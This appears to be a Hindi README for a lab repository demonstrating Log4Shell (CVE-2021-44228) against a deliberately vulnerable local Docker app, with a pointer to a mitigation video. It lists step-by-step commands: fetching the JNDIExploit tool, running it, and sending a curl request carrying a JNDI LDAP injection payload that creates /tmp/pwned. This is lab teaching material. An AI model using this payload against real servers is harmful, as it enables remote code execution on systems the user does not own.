
यह रिपॉजिटरी Log4j 2021 (CVE-2021-44228) भेद्यता प्रदर्शन और शमन के लिए है।
यह रिपॉजिटरी Log4j 2021 (CVE-2021-44228) भेद्यता के प्रदर्शन और शमन के लिए है।
CVE-2021-44228 / Log4Shell भेद्यता में कमजोर सॉफ्टवेयर में एक दुर्भावनापूर्ण पेलोड इंजेक्ट करना शामिल है, जो Log4J से JNDI और LDAP प्रोटोकॉल के माध्यम से किसी तृतीय-पक्ष स्रोत से मान प्राप्त करने के लिए कहता है। ... आयातित डेटा कोड हो सकता है, जिसे Log4J सिस्टम पर निष्पादित करेगा।
हम Docker में CVE-2021-44228 के लिए कमजोर एक Spring Boot वेब एप्लिकेशन चलाते हैं, जिसे @christophetd द्वारा Log4Shell उपनाम दिया गया है।
यह Log4j 2.14.1 (spring-boot-starter-log4j2 2.6.1 के माध्यम से) और JDK 1.8.0_181 का उपयोग करता है।
docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

हम इस मामले में वेब आर्काइव से Log4Shell के लिए JNDI एक्सप्लॉइट डाउनलोड करते हैं, लेकिन आप इसे जहाँ भी उपलब्ध हो वहाँ से डाउनलोड कर सकते हैं।
wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

हम अपनी मशीन का IP पता प्राप्त करते हैं जो Log4Shell एप्लिकेशन का Docker चला रही है।
ifconfig

हम Log4Shell के लिए JNDI एक्सप्लॉइट के साथ zip को अनज़िप करते हैं, इसलिए हमें JAR मिलता है और हम इसे चरण 3 में प्राप्त अपना IP डालकर निष्पादित करते हैं।
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'


docker exec vulnerable-app ls /tmp

Windows और Linux में Log4Shell भेद्यता को कम करने के तरीके का वीडियो: MITIGATION

Feryael Justice 2022